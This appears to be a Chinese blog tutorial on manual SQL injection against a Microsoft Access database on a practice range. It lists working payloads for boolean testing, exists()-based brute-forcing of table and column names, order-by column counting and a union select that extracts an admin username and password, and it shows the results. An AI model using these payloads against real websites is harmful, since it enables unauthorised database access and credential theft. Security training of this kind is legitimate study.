码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • SQL手工注入漏洞测试(Access数据库)


    💪💪Access数据库

    • 1.access基础知识
    • 2.漏洞攻击
        • 2.1判断是否有注入
        • 2.2信息收集
        • 2.3注入获取数据库名
        • 2.4注入获取表名
        • 2.5注入获取列名
        • 2.6注入获取信息


    1.access基础知识

    1. 💪💪Access 是一个功能强大、方便灵活的关系型数据库管理系统。 Access 2003作为一个小型数据库管理系统,它最多能为由此由25-30台计算机组成的小型网络服务。进入 Access ,打开一个示例数据库,可以看到如下的界面access界面
    2. 💪💪除了access数据库之外,几乎所有的数据库都是一个大的数据库中有许多数据库,然后所有的数据库的部分数据都放在一个数据库中,这个数据库就是information_schema,如下是mysql数据库

    ⚠️⚠️总结:由上面的知识我们可以知道,access数据库的注入肯定不能够像其他的数据库,因为没有information_schema数据库,就只有access一个数据库,所有所有的表,列,以及信息都只能够爆破,直接上靶场靶场地址

    2.漏洞攻击

    2.1判断是否有注入

    ?id=1 and 1=1
    ?id=1 and 1=2
    如果如上两语句显示结果相同,就说明变量id被符号包围了,因为如下两条语结果相同
    select * from sql_test where id='1 and 1=1'; select * from sql_test where id='1 and 1=2';
    在这里插入图片描述
    所以这时候测试?id=1’ and 1=1 --+等,为什么要这么测试原因如下:

    • 💎💎如果我写在网站后面输入?id=1,sql语句执行如下:select * from user where id = 1;我们知道and运算符,必须两边为真才为真,假设我们输入?id=1 and 1=1,sql语句执行如下:
    • 💎💎select * from user where id = 1 and 1= 1;,这条语句会被执行,并且结果为真,页面会出现变化,如果我们输入?id=1 and 1=2,sql语句执行如下:
    • 💎💎select * from user where id = 1 and 1= 2;这条语句会被执行,并且结果为假,页面不会出现变化 存在注入说明我输入的语句会被执行,如果不存在注入,不管sql语句是否为真,都不会执行
      请添加图片描述
      请添加图片描述
      请添加图片描述
      请添加图片描述

    2.2信息收集

    2.3注入获取数据库名

    数据库不用想了,就是access

    2.4注入获取表名

    爆破表名

    select * from sql_test where id = 1 and exists(select * from sql_test);
    
    • 1

    使用exists(),让前面sql语句为真,and前后必须都为真才显示正确,所以可以判断是不是正确的表名,注入语句如下:
    ?id=1 and exists(select * from Access),进行爆破结果如下:
    在这里插入图片描述
    有admin和news表

    2.5注入获取列名

    ?id=1 and exists(select * from admin),进行爆破结果如下:
    在这里插入图片描述
    admin表下有id,username,passwd

    2.6注入获取信息

    如上都是使用盲注,就是爆破的方式获取的数据库,表,列的信息,但是信息的获取使用盲注不太现实,应为总类太多了,这里还是使用union注入:

    ?id=1 order by 4 :显示正常 ?id=1 order by 5 :显示不正常
    所以有4列

    mysql和access输出点区别:

    • ?id=1 union select 1,2,3,4 from admin access数据库
    • ?id=1 union select 1,2,3,4 mysql数据库

    accesss数据库没有limit在这里插入图片描述> ?id=1 union select 1,username,passwd,4 from admin得到结果如下:
    moke
    7e6ec4fadf84938f
    所以用户名和密码为

    • moke
    • 27737201

    在这里插入图片描述

  • 相关阅读:
    写给小白 : 如何学习编程?
    Postgresql源码(59)事务ID取值和判断规律总结
    Go学习第七章——数组arr,切片slice和映射map
    【7.21-26】代码源 - 【体育节】【丹钓战】【最大权值划分】
    【机器学习9】前馈神经网络
    Java教程:如何用控制台打印日历?
    快来跟我一起抢先看看未来世界的出行,体验未来城市吧~
    iPhone升级iOS17出现无法连接互联网的错误提示怎么办?
    [强网杯 2019]随便注
    代码随想录算法训练营第四十三天| LeetCode1049. 最后一块石头的重量 II、LeetCode494. 目标和、LeetCode474. 一和零
  • 原文地址:https://blog.csdn.net/qq_53568983/article/details/127755365
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号